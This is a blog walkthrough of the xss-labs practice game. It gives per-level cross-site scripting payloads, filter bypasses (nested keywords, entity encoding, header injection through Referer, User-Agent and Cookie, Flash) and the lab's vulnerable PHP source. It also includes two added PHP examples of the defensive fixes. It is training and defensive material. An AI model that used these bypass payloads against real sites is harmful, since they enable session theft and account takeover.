How to pass the XSS game levels

1. Start: plain script injection

<script>alert('a')</script>

<script>alert(1)</script>

<script>confirm("Well done!")</script> <script>prompt("Well done!")</script>

 

2. Pay attention to closing the attribute first

test"> <script>alert('1')</script>

test"><script>confirm("Well done!")</script> test"><script>prompt("Well done!")</script>

 

3. Angle brackets are filtered: trigger through an event handler and close the attribute with a single quote

' oninput=alert`1` //

' oninput=alert`1` '

' onchange=alert`1` //

' onchange=alert`1` '

' onclick='window.alert()

 

Source: http://www.runoob.com/jsref/event-oninput.html

oninput event

Example

Execute JavaScript when the user types into an <input>: <input type="text" oninput="myFunction()">

Definition and Usage

The oninput event is triggered on user input.

The event fires when the value of an <input> or <textarea> element changes.

Tip: this event is similar to the onchange event. The difference is that oninput fires immediately when the element's value changes, while onchange fires only when the element loses focus. Another difference is that onchange also works on <keygen> and <select> elements.

 

4. Same as level 3, except the attribute is closed with a double quote

" oninput=alert`1` //

 

5. The source replaces "on" with "o_n" and "script" with "sc_ript"

That means no event handlers and no script tags. A link with a javascript: URL needs neither:

"> <a href="javascript:alert(/1/)">click me</a> //

This renders a clickable link; following it runs the alert.

 

6. The filter is case-sensitive, so mixed case bypasses it

"> <Script>alert('handsome boy')</script> //

"> <img Src=x OnError=alert('xss')> //

Why can't level 5 be bypassed by changing case? Looking at its source, the following functions are called:

 

7. Blacklisted keywords are replaced with the empty string

<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=search />
</form>
</center>';
?>

Each keyword is removed only once, so nesting it inside itself survives the filter:

" oonninput=alert(1) "

"> <scscriptript>alert`xss`</scscriptript> //
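Why the blacklist is the wrong tool, as an added example that is not part of this write-up or of the xss-labs source: the level 7 logic rebuilt as a function beside the fix a defender would apply, encoding the value for the attribute it is written into. Function names are my own; the inputs are the two payloads above, and the same fix applies wherever later levels reflect a parameter or header into an attribute.

```php
<?php
// Added example (not xss-labs code). Reproduces the level 7 idea:
// lowercase, then remove each blacklisted word exactly once.
function level7_filter(string $keyword): string {
    $str = strtolower($keyword);
    foreach (['script', 'on', 'src', 'data', 'href'] as $word) {
        $str = str_replace($word, '', $str);
    }
    return $str;
}

// Defender's version: no blacklist at all. The value lands inside a
// double-quoted attribute, so encode it for that context. ENT_QUOTES turns
// " into &quot;, so the attribute can never be closed by the input.
function encode_for_attribute(string $keyword): string {
    return htmlspecialchars($keyword, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Same markup the lab emits, with the (filtered or encoded) value inserted.
function render_input(string $value): string {
    return '<input name=keyword value="' . $value . '">';
}

// Constructed inputs: the two bypasses from the write-up.
$payloads = [
    '" oonninput=alert(1) "',
    '"> <scscriptript>alert`xss`</scscriptript> //',
];

foreach ($payloads as $p) {
    // Blacklist: "oonninput" loses one "on" and becomes "oninput";
    // "scscriptript" loses one "script" and becomes "script".
    echo "blacklist: " . render_input(level7_filter($p)) . "\n";
    // Encoding: the quotes become &quot; and the value stays inert text.
    echo "encoded:   " . render_input(encode_for_attribute($p)) . "\n\n";
}
```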

8. Filtered: ", src, on, script, data. Test string:

"'%&#></script><p class="οnmοuseοver=" οnmοuseοver="xx" onxxx="">xxx</p>

<input name=keyword value="&quot;'%&amp;#&gt;&lt;/script&gt;&lt;pclass=&quot;οnmοuseοver=&quot; οnmοuseοver=&quot;xx&quot; onxxx=&quot;&quot;&gt;xxx&lt;/p&gt;">

The exploit string is: javascript:alert(1)

Encoding one character as an HTML entity (hexadecimal) bypasses the filter, because the browser decodes the entity before treating the value as a URL:

javasc&#x72;ipt:alert(1)

 

9. The following check of URL validity is added

if(false===strpos($str7,'http://'))
{
    echo '<center><BR><a href="Your link is illegal? Do you have it or not?">Friendship links</a></center>';
}

The check only asks whether the string contains http:// anywhere, so appending it inside a JavaScript comment satisfies it:

javascript:alert(1) //http://

javasc&#x72;ipt:alert(1)//http://
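Added example, not from the write-up or the lab: the level 9 substring test beside the check a defender would use, parsing the URL and allowing only http and https schemes before encoding it for the attribute. It runs over the two payloads above and two constructed legitimate URLs, and shows the substring test is both too loose (accepts the payloads) and too strict (rejects https). Function names are my own.

```php
<?php
// Added example (not xss-labs code). Level 9's idea: a link is "legal"
// if the string contains http:// somewhere.
function level9_check(string $url): bool {
    return strpos($url, 'http://') !== false;
}

// Defender's version: parse the URL, require a scheme on an allowlist and a
// host, then encode the result for the attribute it is written into.
// Returns null when the link must be rejected.
function safe_link(string $url): ?string {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: two legitimate links and the two payloads above.
$inputs = [
    'http://example.com/page',
    'https://example.com/page',
    'javascript:alert(1) //http://',
    'javasc&#x72;ipt:alert(1)//http://',
];

foreach ($inputs as $u) {
    // parse_url yields scheme "javascript" with no host for the third input,
    // and only a path for the fourth (its "scheme" has invalid characters),
    // so both are rejected; https passes the allowlist but fails the substring test.
    printf("%-36s substring: %-5s allowlist: %s\n", $u,
        level9_check($u) ? 'pass' : 'block',
        safe_link($u) === null ? 'block' : 'pass');
}
```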

 

10. The angle brackets < and > are filtered

With angle brackets filtered, the first thing to consider is an event attribute to trigger the XSS.

Look at the source code:

<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>No and".htmlspecialchars($str)."Relevant results.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>

Besides keyword, the page also accepts a t_sort parameter. keyword is not filtered, but it is not connected to anything else; the injection point is t_sort.

The t_sort input has type="hidden", so the payload must also set type="text" to make the element visible:

?keyword=12&t_sort="; type="text" onclick="alert(111)

?keyword=12&t_sort="; type="text" onmouseover="alert(111)

(Screenshot: before and after comparison.)

 

11. Inject through the Referer header

 

Combined with the source code:

$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
...
<input name="t_ref" value="'.$str33.'" type="hidden">

The Referer header is reflected into a hidden input the same way t_sort was in level 10, so you can construct your own Referer value:

Referer:12&t_sort="; type="text" onclick="alert(111)

 

12. Inject through the User-Agent header

Same as level 11.

 

13. Inject through the Cookie header

Similarly, note that the cookie parameter name is user, and pay attention to closing the attribute in the constructed statement.

" type="text" onclick="alert(111)

With the F12 developer tools you can fuzz and see which characters are received and which are filtered.

 

14. XSS through rendering of a picture's EXIF information

Checking the source code shows that an iframe page is embedded. It points at http://www.exifviewer.org/, a website for viewing the EXIF information of pictures, so this level is XSS through an uploaded picture.

The website used by this level has been shut down.

For reference: http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0194934.html

 

15. The AngularJS ng-include directive

The correct access link for level 15 is as follows:

http://127.0.0.1/xss/level15.php?src=1.gif

The ng-include directive is used to include an external HTML file.

The included content becomes a child of the specified element.

The value of the ng-include attribute can be an expression that returns a file name.

By default, the included file must be on the same domain.

'level4.php?keyword=%22%20onfocus=alert(1)%20%22'

This is the payload found online, but it did not work for me; I haven't come across this before and can't solve it for the time being.

 

16. Filters script, space and /

Bypass by using a %0d line break in place of the space.

Payload: <img%0Dsrc=1%0Donerror=alert(1)>

 

17. Filters >

The input lands inside an <embed> tag. The <embed> tag defines embedded content, such as a plug-in.

Trigger with an event attribute: onmousedown, onfocus and others work, but I don't know why onclick doesn't.

Payload: arg01=a&arg02=b onfocus=alert(1)

Both parameters are used.

 

18. Same as 17

arg01=a&arg02=b onfocus=alert(1)

My test here behaves the same as level 17, but online write-ups say only the first parameter takes effect, and you can't see the difference by reading the PHP source. It seems to be related to Flash, that is, the swf files in the source code. I'm too much of a novice to understand it.

 

19. Flash XSS

Reference: http://blog.icxun.cn/note/308.html

Payload: arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E

 

20. Still don't understand this one

Payload:

arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height


Tags: PHP Javascript AngularJS

Posted on Thu, 12 Mar 2020 00:50:12 -0700 by andymoo